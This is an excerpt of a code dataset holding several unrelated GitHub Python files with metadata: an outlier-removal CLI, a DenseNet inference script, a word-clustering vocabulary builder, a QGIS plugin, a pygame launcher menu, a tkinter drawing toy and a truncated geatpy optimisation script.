CelebA(**kwargs)\n elif name == 'lsun_bedroom':\n return LSUNBedroom(**kwargs)\n elif name == 'lsun_bedroom64':\n return LSUNBedroom64(**kwargs)\n elif name == 'mscoco256_features':\n return MSCOCO256Features(**kwargs)\n elif name == 'mscoco256_features_karpathy':\n return MSCOCO256FeaturesKarpathy(**kwargs)\n elif name == 'bit_mscoco_text':\n return BitMSCOCOText(**kwargs)\n else:\n raise NotImplementedError(name)\n","repo_name":"ML-GSAI/DPT","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":30295,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"} +{"seq_id":"11364338185","text":"import click\nfrom pathlib import Path\nfrom .algorithm import (\n OutlierDetectionModel,\n TrailingZScoreConfig,\n DEFAULT_LOOKBACK_WINDOW,\n)\nfrom .utils import (\n cli_error,\n cli_print_outlier_output,\n cli_read_csv,\n cli_saved_removed_outliers,\n)\n\n\n@click.command()\n@click.argument(\"src-path\", type=Path)\n@click.argument(\"field\", type=str)\n@click.option(\n \"--dest-path\",\n default=None,\n help=(\n \"Optionally add name of output file. \"\n \"Filename is suffixed with '-altered' if this is not provided\"\n ),\n)\n@click.option(\n \"--inc-current\",\n default=False,\n type=bool,\n help=(\n \"Include the current observation in the z-score calc. This determines \"\n \"the scoring strategy described in the readme\"\n ),\n)\n@click.option(\n \"--lookback\",\n default=DEFAULT_LOOKBACK_WINDOW,\n help=\"Look back window used to calculate z scores\",\n type=int,\n)\ndef main(src_path: Path, field: str, dest_path: Path, inc_current: bool, lookback: int):\n \"\"\"\n \\b\n\n Remove outliers from a CSV.\n\n Required Arguments:\n\n - SRC-PATH: Path: Path to the csv to remove outliers from\n\n - FIELD: str: Column name of discrete variable evaluate\n \"\"\"\n\n config = TrailingZScoreConfig(\n lookback_window=lookback, z_score_incl_current=inc_current\n )\n src_path = src_path.resolve()\n if not src_path.is_file():\n cli_error(f\"File '{str(src_path)}' does not exist\")\n\n data = cli_read_csv(src_path)\n model = OutlierDetectionModel(config)\n\n try:\n if field not in data.columns:\n raise KeyError(f\"KeyError: column '{field}' not a valid column name\")\n outliers = model.fit_predict(data[field])\n except Exception as e:\n cli_error(str(e))\n\n cli_print_outlier_output(data, outliers)\n\n cli_saved_removed_outliers(src_path, data, outliers, dest_path)\n\n\n@click.group()\ndef cli():\n pass\n\n\ncli.add_command(main)\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"nicelgueta/outlier-detection","sub_path":"outliers/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43825133185","text":"import tensorflow as tf\nimport cv2\nimport time\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom utils import *\n\ndense_block1_num = 2\ndense_block2_num = 2\ndense_block3_num = 3\ndense_block4_num = 3\ngrowth_rate = 16\ntest_number = 0\n\n\ndef dense_net(image, img_name_index, is_training=True):\n with tf.variable_scope('conv1') as scope:\n l = conv2d(image, 3, 24, 3, 1)\n\n with tf.variable_scope('conv2_3') as scope:\n l_big = bn_relu_conv(l, is_training, 24, 32, 3, 1, name='bn_relu_conv1')\n # l = bn_relu_conv(l, is_training, 32, 32, 3, 1, name='bn_relu_conv2')\n\n # 跳链接层数可以多,其他地方尽量少\n l_first_down = tf.nn.max_pool(l_big, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n with tf.variable_scope('block1') as scope:\n # l = conv2d(l_first_down,32,growth_rate,3,1)#delete\n l = l_first_down\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l, is_training, growth_rate*(dense_block1_num+1), 32, 3, 1)\n block1, l = add_transition_average('transition1', l, is_training,\n input_filters=growth_rate * dense_block1_num + 32, output_filters=32)\n\n with tf.variable_scope('block2') as scope:\n # l = conv2d(l,32,growth_rate,3,1)#delete\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l,is_training,growth_rate*(1+dense_block2_num),32,3,1)\n block2, l = add_transition_average('transition2', l, is_training,\n input_filters=growth_rate * dense_block2_num + 32, output_filters=32)\n\n with tf.variable_scope('block3') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n block3, l = add_transition_average('transition3', l, is_training,\n input_filters=growth_rate * dense_block3_num + 32, output_filters=32)\n\n with tf.variable_scope('block4') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block4_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n\n with tf.variable_scope('block3_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block4_num + 32, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block3], 3)\n # l=bn_relu_conv(l,is_training,64,growth_rate,3,1,name='bn_relu_conv2')\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block2_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block3_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block2], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block1_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block2_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block1], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n l = bn_relu_conv(l, is_training, growth_rate * dense_block1_num + 64, 32, 3, 1, name='bn_relu_conv1')\n with tf.variable_scope('upsample1') as scope:\n l = upsample(l, 32, 32, 3, 2)\n # concat\n l = tf.concat([l, l_big], 3)\n l = bn_relu_conv(l, is_training, 64, 64, 3, 1)\n l = tf.nn.dropout(l, 0.5)\n # spatial dropout,dropout rate 0.5\n l = bn_relu_conv(l, is_training, 64, 32, 1, 1, name='bn_relu_conv2')\n\n with tf.variable_scope('bn_sigmoid_conv') as scope:\n l = bn_relu_conv(l, is_training, 32, 1, 1, 1)\n\n image_conv = tf.nn.sigmoid(l)\n\n saver = tf.train.Saver()\n if ckpt and ckpt.model_checkpoint_path:\n if img_name_index == 0:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print('model restored')\n return image_conv\n\n\ndef inference(image, img_name_index, is_training=True, scope_name='inference_net', scope_reuse=True):\n with tf.variable_scope(scope_name, reuse=scope_reuse) as scope:\n if scope_reuse:\n scope.reuse_variables()\n annotation_pred = dense_net(image, img_name_index, is_training)\n return annotation_pred\n\n\nsess = tf.InteractiveSession()\n# height = 960#训练图片的高\n# width = 960#训练图片的宽\nbatch_size = 40\nwrite_number = 0\nis_training = True\nprevious_time = time.clock()\ntotal_loss_list = []\nckpt = tf.train.get_checkpoint_state('E:/Tianchi/Densenet/my_network/model/')\n\npath = 'E:/Tianchi/NEW_DATA2/224_rgb/2015_224_rgb/'\nwrite_path = 'E:/Tianchi/Densenet/my_network/result_newmodel45000_2015_224/'\nimage_number = len(os.listdir(path))\nwrite_number = write_number + 1\noutput_store = np.zeros([batch_size, 224, 224, 3])\nfor img_name_index in range(0, image_number, batch_size):\n if img_name_index + batch_size > image_number:\n batch_size = image_number - img_name_index\n img_batch_store = np.zeros([batch_size, 224, 224, 3])\n for i in range(batch_size):\n img_path_input = path + os.listdir(path)[img_name_index + i]\n img_test = cv2.imread(img_path_input)\n # height,width,channel = img_test.shape\n img_test = cv2.resize(img_test, (224, 224), interpolation=cv2.INTER_CUBIC)\n img_batch_store[i, :, :, :] = img_test\n\n img_test_tensor = tf.convert_to_tensor(img_batch_store, dtype=tf.uint8)\n img_input = tf.reshape(img_test_tensor, [batch_size, 224, 224, 3])\n img_input = tf.cast(img_input, tf.float32)\n img_input = img_input * (1. / 255)\n if img_name_index == 0:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=False)\n else:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=True)\n # output = inference(img_input, is_training=True,scope_reuse=True)\n # output =model_enhance_subpixel_BN.transform_net(img_input,size, upscale,scope_reuse=True,is_training=False)\n output = output * 255\n output = tf.reshape(output, [batch_size, 224, 224, 1])\n output = output.eval()\n output[output > 100] = 255\n output[output <= 100] = 0\n\n for j in range(batch_size):\n savepath = write_path + os.listdir(path)[img_name_index + j]\n # output1 = cv2.resize(output[j,:,:,:], (224,224), interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(savepath, output[j, :, :, :])\n","repo_name":"qwerty200696/Tianchi_Competition_2017","sub_path":"code/20171105/Densenet/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"22803296874","text":"from sklearn.cluster import KMeans\nfrom numbers import Number\nfrom pandas import DataFrame\nimport sys, codecs, numpy\nimport pickle\nfrom tqdm import tqdm\nfrom gensim.models import FastText\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\n\nclass autovivify_list(dict):\n '''A pickleable version of collections.defaultdict'''\n def __missing__(self, key):\n '''Given a missing key, set initial value to an empty list'''\n value = self[key] = []\n return value\n\n def __add__(self, x):\n '''Override addition for numeric types when self is empty'''\n if not self and isinstance(x, Number):\n return x\n raise ValueError\n\n def __sub__(self, x):\n '''Also provide subtraction method'''\n if not self and isinstance(x, Number):\n return -1 * x\n raise ValueError\n\ndef build_word_vector_matrix(vector_file, n_words):\n '''Return the vectors and labels for the first n_words in vector file'''\n numpy_arrays = []\n labels_array = []\n with codecs.open(vector_file, 'r', 'utf-8') as f:\n for c, r in enumerate(f):\n sr = r.split()\n labels_array.append(sr[0])\n numpy_arrays.append( numpy.array([float(i) for i in sr[1:]]) )\n\n if c == n_words:\n return numpy.array( numpy_arrays ), labels_array\n\n return numpy.array( numpy_arrays ), labels_array\n\ndef find_word_clusters(labels_array, cluster_labels):\n '''Return the set of words in each cluster'''\n cluster_to_words = autovivify_list()\n for c, i in enumerate(cluster_labels):\n cluster_to_words[ i ].append( labels_array[c] )\n return cluster_to_words\n\nword_list = []\nsentences = []\n\nstop_words = set(stopwords.words('english'))\n\n# filename = sys.argv[1]\n\n# python kmeans.py glove.6B.100d.txt 300 .1\nif __name__ == \"__main__\":\n # with open(\"../sentences.pkl\", \"rb\") as f:\n # sentences = pickle.load(f)\n\n # with open(\"../word_list.pkl\", \"rb\") as f:\n # word_list = pickle.load(f)\n\n with open(\"../data/X.txt\", 'r') as f:\n cnt = 0\n for line in f:\n cnt = cnt + 1\n if cnt%500 == 0:\n print(\"processed: \"+str(cnt)+\" lines!\")\n word_list.extend(nltk.word_tokenize(line))\n word_list = list(set(word_list))\n sublines = line.strip().split('.')\n sublines = [subline.strip().split(' ') for subline in sublines]\n sentences.extend(sublines)\n word_list = [word for word in word_list if word.isalpha()]\n print (\"Punctuations removed...\")\n word_list = [word for word in word_list if not word in stop_words]\n print (\"Stop words removed...\")\n word_list = list(set(word_list))\n print(\"word_list created successfully!\\n\"+str(len(word_list)))\n print(len(sentences))\n\n # using FastText to create embeddings from our dataset\n print(\"creating FastText model!\")\n model = FastText(sentences, size=100, window=5, min_count=5, workers=8,sg=1)\n print(\"FastText model created successfully!\")\n \n numpy_arrays = []\n labels_array = []\n print(\"creating vocabulary clusters...\")\n for word in word_list:\n labels_array.append(word)\n try:\n numpy_arrays.append(model[word])\n except:\n pass\n df = numpy.array(numpy_arrays)\n\n n_words = int(sys.argv[1]) # Number of words to analyze\n reduction_factor = float(sys.argv[2]) # Amount of dimension reduction {0,1}\n n_clusters = int( n_words * reduction_factor ) # Number of clusters to make\n kmeans_model = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n kmeans_model.fit(df)\n\n cluster_labels = kmeans_model.labels_\n cluster_inertia = kmeans_model.inertia_\n cluster_to_words = find_word_clusters(labels_array, cluster_labels)\n\n with open('cluster_to_words.ft.pkl', 'wb') as f:\n pickle.dump(cluster_to_words, f)\n \n print(\"cluster vocabulary created successfully!\")\n\n with open('cluster_to_words.ft.pkl', 'rb') as f:\n clusters = pickle.load(f)\n \n # print(clusters)\n\n# maxlen = 0\nwith open('synonym_sample.kmeans1.ft.syn', 'w+') as f:\n print(\"creating dictionary...\")\n for c in clusters:\n # print((clusters[c]))\n # print(\"\\n\")\n # maxlen = max(maxlen, len(clusters[c]))\n # if maxlen < len(clusters[c]):\n # maxlen = len(clusters[c])\n # maxc = clusters[c]\n \n words = clusters[c]\n root, words = words[0], words[1:]\n \n f.write(root+' '+root+'\\n')\n for i in range(len(words)):\n f.write(words[i]+' '+root+'\\n')\n f.write('indices'+' '+'index*')\n print(\"dictionary created successfully...\")\n\n # print(maxlen)\n # print(maxc)","repo_name":"urmisaha/Semantic_Text_Indexing_With_PostgreSQL","sub_path":"k-means-clustering/kmeans_create_vocab.py","file_name":"kmeans_create_vocab.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71788540167","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom .resources import *\n\n#メニュー読み込み\nfrom .Sample_Menu_01 import SampleMenu01\nfrom .Sample_Menu_02 import SampleMenu02\n\nimport os\nimport os.path\nimport sys\nimport codecs\n\nQString = str\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass Sample:\n def __init__(self, iface):\n self.iface = iface\n self.canvas = self.iface.mapCanvas()\n\n self.plugin_dir = os.path.dirname(__file__)\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'Sample_{}.qm'.format(locale))\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n self.actions = []\n self.menu = u'Sample'\n self.toolbar = self.iface.addToolBar(u'Sample')\n self.toolbar.setObjectName(u'Sample')\n\n def tr(self, message):\n return QCoreApplication.translate('Sample', message)\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n if status_tip is not None:\n action.setStatusTip(status_tip)\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n if add_to_toolbar:\n self.toolbar.addAction(action)\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n self.actions.append(action)\n return action\n\n def initGui(self):\n self.win = self.iface.mainWindow()\n icon_path = ':/plugins/Sample/icon.png'\n #メニュー設定\n self.add_action(\n icon_path=None,\n text=u\"Menu01\",\n callback=self.Menu01,\n parent=self.win)\n self.add_action(\n icon_path=None,\n text=u\"Menu02\",\n callback=self.Menu02,\n parent=self.win)\n\n def unload(self):\n for action in self.actions:\n self.iface.removePluginMenu(\n u'Sample',\n action)\n self.iface.removeToolBarIcon(action)\n del self.toolbar\n\n #Menu01メニュークリック\n def Menu01(self):\n #SampleMenu01読み込み\n self.sample_menu_01 = SampleMenu01(self.iface)\n #Menu01クリックでメッセージ表示\n self.sample_menu_01.message_add()\n\n #Menu02メニュークリック\n def Menu02(self):\n #SampleMenu02読み込み\n self.sample_menu_02 = SampleMenu02(self.iface)\n #SampleMenu02Dialog表示\n self.sample_menu_02.dlg.show()\n\n def run(self):\n pass\n","repo_name":"dayjournal/PythonMapAppPlugin","sub_path":"Chapter_04/qgis3plugin-starter/dist/Sample/Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"47331943420","text":"# coding=utf-8\n\n# python2 issues, div with float, not int\nfrom __future__ import division\nimport pygame\nimport os\n\ntry:\n from datetime import datetime, timedelta\nexcept:\n import datetime\n\nfrom core.constants import *\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(os.path.join(PATH, \"log.txt\"))\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nfrom core.colors import *\nfrom core.component.upbar import UpBar\n\nfrom core.component.squaredmenu import SquaredMenu\nfrom core.component.dialog import Dialog\nfrom core.component.simplenotification import SimpleNotification\nfrom core.component.mainpygame import MainPyGame\nfrom core.section.gogpygame import GOGPygame\nfrom core.section.itchpygame import ItchPygame\nfrom core.section.repositorypygame import RepositoryPygame\nfrom core.section.settingspygame import SettingsPygame\nfrom core.section.quitpygame import QuitPygame\nfrom core.section.wificonfigurationpygame import WifiConfigurationPygame\nfrom core.effect.pixelate import pixelate\n\nclass MenuPygame(MainPyGame, SquaredMenu, GOGPygame, ItchPygame, RepositoryPygame, SettingsPygame, WifiConfigurationPygame, QuitPygame):\n\n def __init__(self):\n # init\n # pygame.init()\n pygame.display.init()\n pygame.font.init()\n\n self.initJoysticks()\n self.loadSettings()\n self.playMusicFromSettings()\n # Create pygame screen and objects\n #self.surface = pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n self.surface = pygame.display.set_mode(WINDOW_SIZE)\n self.clock = pygame.time.Clock()\n pygame.display.set_caption('Menu principal')\n self.gog = None #TODO check if it could be serialized, stored, restored and synchronized with background process\n self.itch = None\n\n def main(self):\n self.notification = SimpleNotification(surface=self.surface,clock=self.clock,parent=self)\n #show notification for dev revision\n self.notification.showNotification(text='dev revision')\n options = [\n {\n \"title\" : \"Aceptar\"\n }\n ]\n #show alert for configuration\n self.dialog = Dialog(surface=self.surface,title=\"Welcome\",message=\"Please configure before use\",options=options)\n self.dialog.draw()\n\n self.drawMainMenu()\n\n def drawMainMenu(self):\n menus = [\n {\"title\": \"Itch.io (alpha)\", \"image\": \"images/itch.png\", \"action\": self.navigateItch},\n {\"title\": \"GOG (alpha)\", \"image\": \"images/GOG.png\", \"action\": self.navigateGOG},\n {\"title\": \"Wifi Configuration\", \"image\": \"images/wifi.png\", \"action\": self.configWifi},\n {\"title\": \"Remote repository\", \"image\": \"images/cloud.png\", \"action\": self.navigateRepository},\n {\"title\": \"Local\", \"image\": \"images/hdd.png\", \"action\": self.createLocalRepo},\n {\"title\": \"Settings\", \"image\": \"images/settings.png\", \"action\": self.settingsMenu},\n {\"title\": \"Exit\", \"image\": \"images/exit.png\", \"action\": self.quit}\n ]\n self.manageMainEvents(menus)\n\n #used to refresh main menu\n def drawMainMenuComponents(self,menus,selected,visibleOptions):\n # draw components\n #self.drawComponents() # at this moment bars\n self.upbar.drawBackground()\n self.upbar.refresh()\n #self.upbar.menu.draw()\n #self.upbar.drawWidgets()\n\n # clean events, needs to be after drawComponents\n self.changes = False\n\n # now draw menus\n rectangles = self.drawSquaredMenus(menus, selected, visibleOptions)\n\n return rectangles\n\n #used to get widgets updated\n def lastTimeWorker(self):\n if self.lastTime + timedelta(seconds=1) > datetime.now():\n #logger.debug(\"refreshing time at %s \" % datetime.now())\n self.lastTime = datetime.now()\n self.upbar.drawWidgets()\n self.changes = False\n\n def manageMainEvents(self, menus, visibleOptions=4): # TODO\n exit = False\n selected = 0\n self.changes = True\n #build component\n self.upbar = UpBar(surface=self.surface)\n\n # colored background\n self.main_background()\n\n refreshed = False\n\n self.lastTime = datetime.now()\n\n hiddenNotification = None\n pixelateTime = None\n while not exit:\n\n if not pixelateTime:\n pixelate(self.surface,False)\n pixelateTime = True\n\n self.clock.tick(FPS)\n\n if self.changes:\n # clean and put background\n self.main_background()\n\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n # clear events\n pygame.event.clear()\n\n if hiddenNotification is not None:\n self.changes = True\n if hiddenNotification + timedelta(seconds=1) > datetime.now():\n #self.notification = None\n pass\n\n if (self.notification is not None and self.notification.active): #TODO\n if (self.notification is not None and self.notification.active):\n hiddenNotification = datetime.now()\n #logger.debug(\"updating when notification is shown... %s\" % hiddenNotification)\n elif hiddenNotification is not None and hiddenNotification+timedelta(seconds=1) > datetime.now():\n if not refreshed:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n refreshed = True\n logger.debug(\"launched one refresh of the components before wait 1 second of last notification was hidden\")\n elif hiddenNotification is not None:\n logger.debug(\"launched final refresh of the components after 1 second of last notification was hidden\")\n hiddenNotification = None\n if self.notification:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n self.lastTimeWorker()\n\n # DEBUG: get events and configure\n events = pygame.event.get()\n if len(events) != 0:\n logger.debug(\"mainEvent event %s\" % str(events))\n\n #now manage dialog\n options = None\n if self.dialog is not None and self.dialog.active:\n options = self.dialog.draw(focus=selected)\n else:\n self.dialog = None\n for event in events:\n # normal events\n if event.type == pygame.QUIT:\n exit = True\n elif event.type == pygame.KEYDOWN:\n self.changes = True\n if event.key == pygame.K_ESCAPE:\n pixelate(self.surface,True)\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n exit = True\n elif event.key == pygame.K_UP:\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_DOWN:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_LEFT:\n # normal part\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_RIGHT:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_b:\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n #normal part\n exit = True\n elif event.key == pygame.K_a or event.key == pygame.K_RETURN:\n if self.dialog is not None and self.dialog.active:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n else:\n #normal part\n pixelate(self.surface,True)\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.key == pygame.K_f:\n if self.surface.get_flags() & pygame.FULLSCREEN:\n pygame.display.set_mode(WINDOW_SIZE)\n else:\n pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n elif event.type == pygame.JOYAXISMOTION:\n self.changes = True\n if event.axis == 1: # up and down\n if event.value > 0:\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n elif event.axis == 0: # left and right\n if event.value > 0:\n if self.dialog is not None and self.dialog.active:\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n\n elif event.type == pygame.JOYBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n if event.button == 1:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n elif event.button == 2:\n selected = 0\n self.dialog.active = False\n else:\n # normal part\n self.changes = True\n if event.button == 1: # button A - enter\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.button == 2: # button B - back\n exit = True\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n for i in range(0,len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n selected = i\n else:\n #normal part\n i = 0\n self.changes = True\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I deduced position %s\" % (start + i))\n selected = (start + i)\n i += 1\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.dialog is not None and self.dialog.active:\n newSelected = -1\n for i in range(0, len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n newSelected = i\n if newSelected == selected:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n self.changes = True\n else:\n # normal part\n i = 0\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I will launch and select position %s\" % (start + i))\n launch = selected == (start + i)\n selected = (start + i)\n if launch:\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n i += 1\n\n pygame.display.flip()\n\n def drawComponents(self):\n self.upbar.draw()\n\n def main_background(self):\n\n if self.on and self.file is not None: # play background music\n self.surface.blit(self.pic, (0, 0))\n else:\n self.surface.fill(COLOR_BACKGROUND)\n","repo_name":"lemoncrest/x-pi-one-launcher","sub_path":"core/section/menupygame.py","file_name":"menupygame.py","file_ext":"py","file_size_in_byte":15414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"15964757448","text":"import tkinter\n\n\ndef f(event):\n c.create_oval((event.x - 10,event.y - 10), (event.x + 10,event.y + 10), fill=color)\n\n\ndef keypress(event):\n global color\n if event.keysym == \"r\":\n color = \"red\"\n if event.keysym == \"g\":\n color = \"green\"\n if event.keysym == \"b\":\n color = \"blue\"\n\n\nw = tkinter.Tk()\ncolor = \"red\"\nc = tkinter.Canvas(width=500, height=500, background=\"white\")\nc.pack()\nc.bind(\"<Motion>\", f)\nw.bind(\"<KeyPress>\", keypress)\nw.mainloop()\n","repo_name":"yandex-lyceum-yakovlev/tkProject2","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37448544670","text":"# -*- coding: utf-8 -*-\nimport geatpy as ea # import geatpy\nimport numpy as np\nimport random\nB=3\nR=6 #此语义下隐含条件 R必须为偶数\nY=1\nS=3\nT=3\nN=Y+S+T\n# 编号规则 稍后补充Dij的自动生成算法\n# 从0开始编号,编号顺序 Y~S~T\nDij=np.array([[0,7,4,9,0,0,0],\n [7,0,0,0,6,7,8],\n [4,0,0,0,10,9,2],\n [9,0,0,0,6,3,7],\n [0,6,10,6,0,0,0],\n [0,7,9,3,0,0,0],\n [0,8,2,7,0,0,0]])\n# d=np.array([[6,7,8],\n# [10,9,2],\n# [6,3,7]])\n# dStart=np.array([7,4,9])\nL=np.array([1,3,3])\nU=np.array([4,4,1])\nNind=50\ncount=1\n\nclass MyProblem(ea.Problem): # 继承Problem父类\n def __init__(self):\n name = 'MyProblem' # 初始化name(函数名称,可以随意设置)\n M = 1 # 初始化M(目标维数)\n maxormins = [1] # 初始化maxormins(目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标)\n # Dim = B*R*S*T # 初始化Dim(决策变量维数)\n Dim = N * N * (B + R) # 初始化Dim(决策变量维数)\n varTypes = [1] * Dim # 初始化varTypes(决策变量的类型,元素为0表示对应的变量是连续的;1表示是离散的)\n lb = [0] * Dim # 决策变量下界\n ub = [2] * Dim# 决策变量上界\n lbin = [1] * Dim # 决策变量下边界(0表示不包含该变量的下边界,1表示包含)\n ubin = [1] * Dim # 决策变量上边界(0表示不包含该变量的上边界,1表示包含)\n # 调用父类构造方法完成实例化\n ea.Problem.__init__(self, name, M, maxormins, Dim, varTypes, lb, ub, lbin, ubin)\n def calReferObjV(self): # 设定目标数参考值(本问题目标函数参考值设定为理论最优值)\n referenceObjV = np.array([[23]])\n return referenceObjV\n\n def aimFunc(self, pop): # 目标函数\n global count\n print(str(count)+\":\",end=\"\")\n count+=1\n\n Yijb = pop.Phen[:,:N*N*B].reshape([Nind, N, N, B]).astype(int) # 得到决策变量矩阵Xijb\n Xijr = pop.Phen[:,N*N*B:].reshape([Nind, N, N, R]).astype(int) # 得到决策变量矩阵Xijr\n l = list(range(Y)) + list(range(Y + S, N))\n\n # 目标函数\n TmaxMin = np.zeros((Nind, B), dtype=np.int) # b # 40*b(40*3)\n for b in range(B):\n for i in range(Y):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(S):\n for j in l:\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(N):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n\n #PPT式1\n 